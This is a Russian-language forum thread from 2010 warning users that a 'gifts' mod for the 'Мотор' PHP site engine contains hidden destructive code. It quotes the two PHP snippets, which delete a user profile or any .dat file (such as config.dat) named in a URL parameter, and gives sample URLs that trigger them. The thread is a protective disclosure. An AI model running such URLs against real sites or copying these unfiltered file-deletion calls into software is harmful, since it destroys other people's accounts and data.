Мод подарки под мотор ОПАСНЫЙ

Сообщество владельцев электротрансп
Печать RSS
689
Мансур 07.06.2010 / 12:33 Автор
Чатланин
0
Помоймо я обнаружел вредный код на скрипте ПОДАРКИ под мотор 18.x. Один пачан ест сказал что уже не использываю двигатель мотор. Я спросил почему? Он сказал что каждый ден удалился логины и мой логин тоже. И пропали файлы дат на локале надоел мне двигатель мотор. Я сказал ну как хочеш но мне нравится. И спросил какие моды бил у тя? Он сказал только мод подарки м много темы добавлял.Искал подарок под мотор и нашел его. Смотрел вес код и там 2 код не нравился мне. Может я ошибаюс на етот 2 код, или не информирванный тема открыл вопшем нарушил здесь правила то отправте меня тюрму) баню))ну я ж не кодер простой бомж кодер знаюший нектрый функций и коды для пхп. Просто подумал чте если об етот 2 коды не написано на ридми значит вредный код)). Первое код удаляет любой ник, второй код удаляет любой дат файл на локале. Например config.dat и другие.Там найдете етот код.
Мансур 07.06.2010 / 12:33 Автор
Чатланин
0
Например Если мы устанавим подарок суда и ктото заходет на етот ссыку visavi.net/pages/podarok.php?action=to&uz=Admin&
то удаляется ник Admin.
//---------------------------- Выбор подарка --------------------------//
if($action=="to"){ 
unlink(BASEDIR."local/profil/$uz.prof"); }
И вот етом коде если ктото заходет на етот ссыку
visavi.net/pages/podarok.php?action=too&m=config.dat&
//---------------------------- Удаление списков --------------------------//
if($action=="too"){
$m=$_GET['m'];
unlink(BASEDIR."local/$m.dat"); }

вот сами файл
тхт

zip
Мансур 07.06.2010 / 12:35 Автор
Чатланин
0
Будте осторожне
Мансур 07.06.2010 / 12:43 Автор
Чатланин
0
Я уже обеснил пачану он уже снова использывает мотор но без штаны)) голый мотор без мода))
И
Игорь 07.06.2010 / 12:51
Оранжевые штаны
0
Там не только это=) он всем выдает права юзера и подобной "бяки"=)
Мансур 07.06.2010 / 12:54 Автор
Чатланин
0
Вот оргинал тхт файл. С автором
http://upwap.ru/901026
Мансур 07.06.2010 / 12:55 Автор
Чатланин
0
5. Rezent aka NeForMat, даа все узеры смогут удалить ))
Lugaro 07.06.2010 / 12:56
ツ ツ ツ
0
весь скрипт одна большая дырка, не чего не фильтруется а в примерах во 2 посте дырка спецом сделана и то через задний проход
Вот это особенно порадовало
$ggg = @file(BASEDIR."/local/profil/$log.prof");
....
$log=check($log);
Сначала файл запрашивается а только потом уже переменная фильтруется, гениально klass
Изменил: Lugaro 07.06.2010 / 13:01
Мансур 07.06.2010 / 13:03 Автор
Чатланин
0
Вот сам подарок боле 300кб
F
finall2 07.06.2010 / 15:24
Чатланин
0
MOD Engine вернулся?Йа счастлив vtopku
Еще бы 16 мотор,переведеланный на китайский язык расковырял-бы. E
Изменил: finall2 07.06.2010 / 15:28
Стикеры / Теги / Правила